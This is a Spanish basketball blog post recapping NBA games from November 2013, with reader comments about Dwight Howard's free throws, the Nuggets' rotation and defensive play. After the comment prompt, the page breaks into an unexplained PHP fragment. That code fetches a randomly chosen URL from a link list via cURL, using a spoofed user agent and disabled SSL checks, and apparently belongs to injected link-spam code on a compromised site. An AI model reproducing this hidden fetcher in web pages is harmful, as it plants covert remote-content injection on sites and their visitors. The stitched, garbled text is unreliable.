La Crónica: El Wade de los viejos tiempos

08 de November de 2013 por txusma

Hay jugadores a los que, a pesar de que parece evidente que el físico empieza a jugarles malas pasadas, nunca puedes infravalorar. La temporada 2012-2013 no fue la mejor para Dwyane Wade a pesar del anillo y no eran pocas la voces que alertaban de un bajón considerable en su nivel. Ayer, con un Lebron James mermado por unas molestias en la espalda, se echó el equipo a la espalda, superó a cualquier defensor que se le enfrentó y consiguió la victoria ante los temibles Clippers de Chris Paul y Blake Griffin. Los Heat dieron una lección táctica aplicando 2 contra 1 sistemáticos contra Chris Paul y bajando el ritmo del partido en la segunda parte para evitar los peligrosos contrataques californianos. Crédito para Spoelstra (97-102).

En el duelo del morbo, victoria para los Lakers en casa de los Rockets gracias a un triplazo de Steve Blake a falta de 1’3 segundos. Pero la clave fue el ‘Hack-a-Howard’ que aplicaron en los últimos 2 minutos y medio de partido y que dio lugar a escenas tan ridículas como esta, con Howard esquivando a los jugadores de los Lakers como si jugaran al pilla-pilla. Unas imágenes que no deberían hacer felices a los responsables de la liga. Parte de culpa la tiene el propio Howard, evidentemente, que con 1 de 6 desde la línea de tiros libres en esos últimos minutos se puede considerar culpable de la derrota de su equipo (99-98). 

Y Denver por fin se estrenó. Lo hizo en casa (como no) y ante unos Hawks que no lo pusieron nada fácil (107-109). Ty Lawson se quedó cerca del triple-doble y dejó en nada los esfuerzos de Paul Millsap por llevase la victoria del Pepsi Center.

PREMIOS

MVP: Dwyane Wade volvió a parecerse aquel de hace unos años y su aportación (29 puntos, 4 rebotes, 7 asistencias y 3 robos) fue vital para que los Heat se impusieran a los Clippers. Ty Lawson se quedó muy cerca del triple doble. Sus 23 puntos, 7 rebotes y 8 asistencias doblegaron finalmente a los Hawks.

Sorpresa: Jodie Meeks anotó 18 puntos con 6 de 9 en tiros de campo y un 5 de 7 en triples. Evan Fournier disfrutó de minutos y consiguió 12 puntitos.

Decepción: Su equipo ganó pero Pau Gasol no se puede sentir del todo satisfecho después de anotar sólo 1 de sus 10 lanzamientos y quedarse con 2 miserables puntos.

Esfuerzo en vano: James Harden estuvo en todas partes pero no pudo amarrar la victoria para su equipo. Sus 35 puntos, 9 rebotes, 5 asistencias, 4 robos y 2 tapones se los acabó llevando el viento. Blake Griffin y Paul Millsap también se fueron de vacío a pesar de sus 27 puntos y 14 rebotes,  y sus 29 puntos, 10 rebotes y 5 asistencias, respectivamente.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

19 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Espero que Brian Shaw se aclare pronto con lo que quiere hacer con los Nuggets. Lo único que parece claro es que Lawson va a ser muy protagonista, es el único jugador que supera los 30 minutos de juego, y eso no es nada bueno para el equipo. Faried o Hickson no pueden salir 20 minutos y aportar lo que deben, no son ese tipo de jugador, McGee está mas acostumbrado pero tampoco va a evolucionar nada con esos minutos de juego. Ayer hasta 10 jugadores jugaron 20 minutos o mas, y solo Lawson mas de 30. Y eso que no están Gallinari ni Chandler, y a ambos los necesita el equipo muchos minutos en cancha.

    Esto provoca de sean el equipo de los que he visto que peor defiende y menos ideas claras tiene en ataque. Hace tiempo sonó que iban a traspasar a Faried, si confian mas en Hickson o en Mozgov(juas juas) deberían hacerlo ya.

      Citar

  2. Luis H. dice:
    #2

    Es recurrente, pero lo de los tiros libres de Howard tiene delito. No puedes hacer un 5 de 16, practicando no entiendo que no pueda llegar a meter 10. ¿Es consciente de que perdió el partido él solo? Por cierto, McHale está reduciendo la rotación cada vez más y va a agotar a Harden y cía. Hay jugadores válidos que no utiliza y no me lo explico

      Citar

  3. Laker1624 dice:
    #3

    Parece que de momento a los Lakers se les dan bien los duelos de “máxima rivalidad” como el debut frente a los Clippers o este último partido contra su querido Howard.

    Me gusta mucho el nuevo recurso del amigo Dwight para evitar el “Hack-a-Howard”… porque supongo que practicar tiros libres no es una opción para él. Nunca entenderé como puede haber jugadores tan pésimos con los tiros libres.

    Que gozada ver a Wade marcarse estos partidos. Si este tío se hubiera mantenido mas sano y no hubiera tenido que ceder protagonismo a LeBron quien sabe de que estaríamos hablando, eso es lo que menos me gusto de la llegada de James a Miami. Pero me parece que Wade no debe arrepentirse mucho de compartir equipo con LeBron. Para mi Wade en sus buenos tiempos era un indiscutible Top-3 del mundo, y su actuación en las finales de 2006 son de las mejores de la historia sin ninguna duda. Pero bueno, ser el escudero de uno de los mejores jugadores de la historia en un equipo que puede ser uno de los mejores de la historia tampoco esta nada mal.

      Citar

  4. rumbero dice:
    #4

    Viva_Dirk:
    Espero que Brian Shaw se aclare pronto con lo que quiere hacer con los Nuggets. Lo único que parece claro es que Lawson va a ser muy protagonista, es el único jugador que supera los 30 minutos de juego, y eso no es nada bueno para el equipo. Faried o Hickson no pueden salir 20 minutos y aportar lo que deben, no son ese tipo de jugador, McGee está mas acostumbrado pero tampoco va a evolucionar nada con esos minutos de juego. Ayer hasta 10 jugadores jugaron 20 minutos o mas, y solo Lawson mas de 30. Y eso que no están Gallinari ni Chandler,y a ambos los necesita el equipo muchos minutos en cancha.

    Esto provoca de sean el equipo de los que he visto que peor defiende y menos ideas claras tiene en ataque. Hace tiempo sonó que iban a traspasar a Faried, si confian mas en Hickson o en Mozgov(juas juas) deberían hacerlo ya.

    La verdad es que no dan buenas sensaciones. Hoy han ganado con un enorme Lawson que ha clavado al final un triplazo a tabla y porque Millsap no ha metido un tiro fácil con ¡Andre Miller! defendiéndolo que los llevaba al OT. Lo peor como dices es que más que pretender una rotación larga Shaw mueve el banquillo de manera diferente en cada partido buscando dar con la tecla. Ese cambio de juego que pretende amoldándose algo más a lo que se pide en PO les está costando meter 10 puntos menos por partido que la temporada anterior y reciben incluso más. Hay que tener algo más de paciencia y ver que pasa con Gallo y Chandler pero de momento no molan ni la mitad que el año pasado.

    Triplazo de Blake y flipante lo poco que se deja el culo en defensa el perímetro de los Rockets. Es que Lin se queda ahí enganchado como si le hiciera pantalla Shaquille O’neal y es Nash con 40 tacos y su portentoso físico.

      Citar

  5. Simon dice:
    #5

    Yo no se a vosotros, pero a mi me da vergüenza ver esas imagenes en las que hasta tres jugadores salen corriendo detras de Howard para hacerle la falta desentendiendose totalmente del balón y jugando al pilla-pilla… estas cosas deberían estar reguladas desde hace mucho tiempo con falta y posesión o técnica o no se… pero alguna forma de pararlas tiene que haber… vale que las faltas intencionadas son muy viejas y usuales en el baloncesto pero esto está pasando ya de castaño a oscuro… y la liga tiene que tomar medidas.
    De Howard mejor no hablar… menudo tío más pésimo y eso que a antes de iniciar la tempordada decía que quería tirar sobre el 80% de acierto en los tiros libres…

      Citar

  6. Jose Luis dice:
    #6

    No tienen que haber disfrutado nada los jugadores lakers viendo como ganaban gracias a los fallos de Howard 😀 (y al acierto de blake claro)

      Citar

  7. franitis dice:
    #7

    1. Delito de Howard no mejorar sus tiros libres a base de práctica; cuando lo pienso no me entra en la cabeza qué tara física o mental impide que un tío, a base de practicar, no pueda meter tiros libres con la punta del… Yo cuando jugaba los tenía “mamados” y fallaba muy poquitos; lógicamente, cuando empecé no metía ni uno, pero después de jugar 5 o 6 años desde los 11 los clavaba… Y este tío es un profesional que lleva jugando a esto muuuuuuuuuuuuuuucho tiempo…

    2. La otra parte también tiene delito… Ya nos planteabamos la misma historia en los tiempos del “Hack’a’Shaq” y no se hizo nada. Lo más fácil es tiro libre a elegir tirador (como las faltas técnicas) + posesión. Sabemos discernir lo que es una falta con balón o en un lance del juego a lo que es un hachazo y si no que lo hagan los árbitros, que para eso cobran por partido + dietas y viajes… Y ya veréis cómo se termina el asunto.

    PD: Ayer no comenté, pero los Celtics ya no son el peor equipo de la liga (al menos por ahora… dejad que lo disfrute…). Y Olynyk aprovechó el regalo para marcarse su primer buen partido en la NBA, espero que no sea el último, aunque no veo que sea el próximo Dirk Nowitzky como he leído en algún foro céltico… Hay un mundo entre los dos. Y ojalá Bass mantenga el nivel que está teniendo, que cuando vuelva Rondo puede empezar a doblarle balones y puede ser muy productiva esa pareja…

      Citar

  8. Esteban dice:
    #8

    Simon:
    Yo no se a vosotros, pero a mi me da vergüenza ver esas imagenes en las que hasta tres jugadores salen corriendo detras de Howard para hacerle la falta desentendiendose totalmente del balón y jugando al pilla-pilla… estas cosas deberían estar reguladas desde hace mucho tiempo con falta y posesión o técnica o no se… pero alguna forma de pararlas tiene que haber… vale que las faltas intencionadas son muy viejas y usuales en el baloncesto pero esto está pasando ya de castaño a oscuro… y la liga tiene que tomar medidas.
    De Howard mejor no hablar… menudo tío más pésimo y eso que a antes de iniciar la tempordada decía que quería tirar sobre el 80% de acierto en los tiros libres…

    si hay forma de pararla, sentar a Howard y ya, pero tanto los lakers el año pasado como estos Rockets, no quieren avergonzar a su estrella sentandolo y ahi estan los resultados

    cosechas lo que siembras

      Citar

  9. Esteban dice:
    #9

    ahora, que bien los Lakers, la verdad me gusta mucho este grupo de malos jugadores, sacrificados por la causa dandolo todo para dar una imagen digna

    un equipo con williams y blake (de escolta) de titular, como anotador puntual a Nick young, y con jugadores de rotacion con minutos como henry y wes jhonson, deberia ser el peor equipo de la NBA, pero bastante peleones estan y al menos dejan una imagen digna en cada juego

      Citar

  10. jeje dice:
    #10

    Lo más fácil para evitar esto es que HOward se quede en el banquillo, sentado, viendo como el resto del equipo le enseña a anotar algún tiro libre.

    Otros tienen la tara en la altura, el físico, la envergadura…él la tiene en los tiros libres…que no juegue los minutos finales, sencillo.

      Citar

  11. Ruxixón dice:
    #11

    Y aparte de ese 80% que pretendía conseguir dijo que entrenaba tirando los tiros libres con los ojos cerrados.Pero bueno,como Howard hay una larga lista de jugadores que dicen entrenar en verano y después nasti de plasti.A mí lo que me revienta de Howard es esa actitud de “uy,no paro de fallar tiros libres” y mete uno y se rie muchas veces,coño,no te rias porque si esa es tu actitud,la que ven ls aficionados ya se ve el énfasis que tienes en mejorar.Y dicho esto Howard me parece una bestia y ójala haga 20-20 todos los partidos,porque me caen bien los Rockets y porque lo tengo en la hoops (xDDD) pero con el tiempo ha desaprovechado la oportunidad de ser uno de los mejores pívots de siempre para ser aquel buen jugador de una época concreta.

      Citar

  12. Denise dice:
    #12

    La mayoría le dais palos y culpais a Howard (que tiene su parte de culpa), pero para mi el gran culpable es McHale, pesimo entrenador que esta viendo que estan perdiendo el partido por culpa de los fallos de DH desde la linea y no lo sienta!!. Joder, si me dices que su recambio es Jason Collins vale, pero tienes ahí a Asik que te hace un buen apaño en defensa en los ultimos minutos, y teniendo en cuenta la mierda de partido de Pau, hasta Motiejunas hubiese sido valido.

      Citar

  13. Esteban dice:
    #13

    Oh denise, poner a asik por howard por el tema de los libres es no cambiar nada, uno ?anza tan mal como el otro, pero es cierto q asik al menos tenia menos presion que howad

    Dantoni tampoco lo sentaba a howard el año pasado

    El problema puede ser howard si se enoja si lo sientan

      Citar

  14. Jose Luis dice:
    #14

    ¿quereis ver una buena defensa?

    poneos el resumen de la pagina nba del clippers miami

    atentos a reddick… sale lo menos 10 jugadas defendiendo penosamente, ya sea allen o wade

    es de risa xdddd

      Citar

  15. Denise dice:
    #15

    Esteban:
    Oh denise, poner a asik por howard por el tema de los libres es no cambiar nada, uno ?anza tan mal como el otro, pero es cierto q asik al menos tenia menos presion que howad

    Dantoni tampoco lo sentaba a howard el año pasado

    El problema puede ser howard si se enoja si lo sientan

    Bueno, el turco llevaba un 4-6 en libres, y no veo a Lakers jugandosela con un hack-a-Asik.

      Citar

  16. Denise dice:
    #16

    Jose Luis:
    ¿quereis ver una buena defensa?

    poneos el resumen de la pagina nba del clippers miami

    atentos a reddick… sale lo menos 10 jugadas defendiendo penosamente, ya sea allen o wade

    es de risa xdddd

    Le dais mucha cera a las alas de los Clippers. Y le dais mucha cera a Redick cuando no es un dios defendiendo y encima le ha tocado bailar con un Wade que posiblemente haya hecho uno de sus mejores partidos en los ultimos 3 años. Hace poco, Redick le metió 26 puntos a los Rockets y el mejor escolta de la liga, Harden, se comió bastantes de sus puntos.

      Citar

  17. futurman dice:
    #17

    Pero es que Harden es muy bueno, pero el culo a defender lo baja poco…

      Citar

  18. Esteban dice:
    #18

    Denise: Le dais mucha cera a las alas de los Clippers. Y le dais mucha cera a Redick cuando no es un dios defendiendo y encima le ha tocado bailar con un Wade que posiblemente haya hecho uno de sus mejores partidos en los ultimos 3 años. Hace poco, Redickle metió 26 puntos a los Rockets y el mejor escolta de la liga, Harden, se comió bastantes de sus puntos.

    nadie dijo que redick era el mejor escolta de la liga dios, erejia

    ojo que ayer anoto una bandeja, no lo podia creer

      Citar

  19. Jose Luis dice:
    #19

    Esteban: nadie dijo que redick era el mejor escolta de la liga dios, erejia

    ojo que ayer anoto una bandeja, no lo podia creer

    Se refiere a Harden, esteban, que el mejor escolta de la liga, Harden, se comio varios de los puntos de Redick.

    Harden es otro matado defendiendo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>